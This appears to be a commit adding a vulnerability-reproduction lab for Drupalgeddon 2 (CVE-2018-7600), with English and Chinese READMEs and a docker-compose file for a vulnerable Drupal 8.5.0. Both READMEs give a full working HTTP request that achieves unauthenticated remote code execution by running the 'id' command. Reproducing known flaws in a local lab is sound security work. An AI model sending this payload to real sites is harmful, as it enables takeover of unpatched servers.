first commit

drupal/CVE-2018-7600/README.md

@@ -0,0 +1,42 @@
+# Drupal Drupalgeddon 2 Unauthenticated Remote Code Execution (CVE-2018-7600)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations including the Form API.
+
+References:
+
+- <https://www.drupal.org/sa-core-2018-002>
+- <https://research.checkpoint.com/uncovering-drupalgeddon-2/>
+
+## Vulnerable environment
+
+Run the following command to start a vulnerable Drupal 8.5.0 environment:
+
+```
+docker compose up -d
+```
+
+After the environment is started, visit `http://your-ip:8080/` and you will see the drupal installation page. Complete the drupal installation using the "standard" profile. Because there is no mysql environment, you should select sqlite database when installing. Once the installation is complete you are ready to start exploiting it.
+
+## Exploit
+
+Referring to [a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py), we can send the following request to drupal:
+
+```
+POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+
+form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
+```
+
+Upon successful execution of the code, the id command is executed:
+
+![](1.png)

drupal/CVE-2018-7600/README.zh-cn.md

@@ -0,0 +1,42 @@
+# Drupal Drupalgeddon 2 未授权远程代码执行漏洞（CVE-2018-7600）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在Drupal 7.58之前的版本、8.3.9之前的8.x版本、8.4.6之前的8.4.x版本和8.5.1之前的8.5.x版本中存在远程代码执行漏洞。该漏洞影响了多个具有默认或常见模块配置的子系统，包括Form API。
+
+参考链接：
+
+- <https://www.drupal.org/sa-core-2018-002>
+- <https://research.checkpoint.com/uncovering-drupalgeddon-2/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 8.5.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`将会看到Drupal的安装页面。使用"标准"配置文件完成Drupal安装。由于环境中没有MySQL，安装时应选择SQLite数据库。安装完成后，即可开始漏洞利用。
+
+## 漏洞复现
+
+参考[a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py)，我们可以向Drupal发送以下请求：
+
+```
+POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+
+form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
+```
+
+代码执行成功后，id命令将被执行：
+
+![](1.png)

drupal/CVE-2018-7600/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/drupal:8.5.0
+   ports:
+    - "8080:80"